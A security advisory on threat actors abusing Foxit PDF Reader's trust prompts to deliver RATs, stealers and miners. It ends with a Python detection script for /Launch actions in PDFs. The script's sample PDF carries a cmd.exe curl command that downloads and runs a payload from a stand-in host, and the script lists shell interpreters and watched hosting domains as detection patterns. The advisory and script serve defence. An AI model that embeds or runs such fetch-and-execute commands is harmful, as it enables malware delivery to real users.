Foxit PDF Reader Flaw Exploited by Hackers to Deliver Diverse Malware Arsenal

Threat actors are leveraging a design flaw in Foxit PDF Reader to distribute a range of malware, including Agent Tesla, AsyncRAT, DCRat, NanoCore RAT, NjRAT, Pony, Remcos RAT, and XWorm. According to a technical report from Check Point, the exploit uses the reader's own security warnings to deceive users into executing harmful commands. The flaw is unique to Foxit PDF Reader: Adobe Acrobat Reader, which is more commonly used in sandboxes and antivirus solutions, is not affected, resulting in a low detection rate for the campaign.

The flaw involves a pop-up that presents "OK" as the default option when users are prompted to trust a document. If users click "OK," a second pop-up appears with "Open" as the default option, leading to the execution of commands that download and run malicious payloads from Discord's content delivery network (CDN). Security researchers noted that users are likely to click "Agreed" on the second message without reading it, a pattern of common user behavior.

Check Point identified a malicious PDF document with a military theme. When opened in Foxit PDF Reader, it executed a command that retrieved a downloader, which in turn fetched two executables designed to collect documents, images, archive files, and databases and upload them to a C2 server. Further investigation revealed that the downloader could also deploy a third payload capable of capturing screenshots from the infected host and uploading them to the C2 server. This activity, linked to espionage, has been attributed to the DoNot Team (also known as APT-C-35 and Origami Elephant), based on similarities with previously observed tactics and techniques.

Security Officer Comments:
In another instance, threat actors used the same technique to deploy a stealer and two cryptocurrency miner modules, XMRig and lolMiner. Some of these malicious PDF files were distributed via Facebook. The Python-based stealer was capable of extracting victims' credentials and cookies from the Chrome and Edge browsers. The miners were retrieved from a Gitlab repository created by a user named topworld20241, which was still active as of the report's writing. Additionally, another case documented by the cybersecurity company involved a PDF file that acted as a conduit to retrieve Blank-Grabber, an open-source information stealer whose GitHub repository has been archived since August 6, 2023, from Discord's CDN. In a separate instance, a malicious PDF included a hyperlink to an attachment on Trello, which upon downloading revealed a secondary PDF carrying the same exploit against Foxit Reader users.

Suggested Corrections:
The continued abuse of legitimate platforms like Discord, Gitlab, and Trello by threat actors helps them evade detection by blending with normal network traffic. Foxit has acknowledged the issue and plans to release a fix in version 2024.3, with the current version being 2024.2.1.25153. Until the software update is applied, Foxit users are advised to remain vigilant about potential exploitation and adhere to classic defense practices. To mitigate the risks of being affected by such threats, it is essential to:

  • Keep operating systems and applications updated through timely patches and other means.
  • Be cautious of unexpected emails with links, especially from unknown senders.
  • Enhance cybersecurity awareness among employees.
  • Consult security specialists for any doubts or uncertainties.
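As an added defender-side triage aid (not code from Check Point or from this advisory), the script below flags PDFs that carry a /Launch action whose command names a shell interpreter or a remote URL, which is the behaviour the abused Foxit prompt flow ends in. It assumes the command is embedded as a /Launch action in an uncompressed object; the sample PDFs, the shell-interpreter list and the host watchlist (built from the platforms this report names) are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Constructed sample PDFs for this example (not files from the campaign): one
# carrying a /Launch action, one harmless document used as a negative control.
LAUNCH_PDF = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /Type /Action /S /Launch /Win << /F (cmd.exe)
 /P (/c curl -o stage1.bin https://cdn.example.invalid/stage1.bin & stage1.bin) >> >> endobj
trailer << /Root 1 0 R >>
%%EOF"""
BENIGN_PDF = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
trailer << /Root 1 0 R >>
%%EOF"""
# Assumed watchlist of hosting platforms named in the report; extend per environment.
WATCHLIST_HOSTS = {"cdn.discordapp.com", "gitlab.com", "trello.com"}
SHELLS = {"cmd", "cmd.exe", "powershell", "powershell.exe", "pwsh.exe", "mshta.exe"}
LITERAL = re.compile(rb"/(F|P)\s*\(((?:\\.|[^\\)])*)\)", re.S)  # /F (...) and /P (...)
URL = re.compile(r"https?://[^\s'\"&|)]+")

def _unescape(s: bytes) -> str:  # resolve \( \) \\ escapes of PDF literal strings
    return re.sub(rb"\\(.)", rb"\1", s).decode("latin-1")

def find_launch_actions(pdf: bytes) -> list[dict]:
    """Return {'file', 'params'} for each /Launch action dict found in the raw bytes."""
    actions = []
    for m in re.finditer(rb"/S\s*/Launch\b", pdf):
        end = pdf.find(b"endobj", m.end())
        window = pdf[m.end(): end if end != -1 else len(pdf)]
        fields = {k.decode(): _unescape(v) for k, v in LITERAL.findall(window)}
        actions.append({"file": fields.get("F", ""), "params": fields.get("P", "")})
    return actions

def classify(action: dict) -> set[str]:
    """Heuristic flags; hex strings and compressed object streams need decoding first."""
    flags = set()
    if action["file"].rsplit("\\", 1)[-1].lower() in SHELLS:
        flags.add("shell_interpreter")
    for url in URL.findall(action["file"] + " " + action["params"]):
        flags.add("remote_url")
        if urlparse(url).hostname in WATCHLIST_HOSTS:
            flags.add("watchlisted_host")
    return flags

def scan(pdf: bytes) -> list[tuple[dict, set[str]]]:
    return [(a, classify(a)) for a in find_launch_actions(pdf)]
```

Run `scan()` over files from the mail gateway or a quarantine folder; any action flagged `shell_interpreter` together with `remote_url` deserves analyst review regardless of whether the host is on the watchlist.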